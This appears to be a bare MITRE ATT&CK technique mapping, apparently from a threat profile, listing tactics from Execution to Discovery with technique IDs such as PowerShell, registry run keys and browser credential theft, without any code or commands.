Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion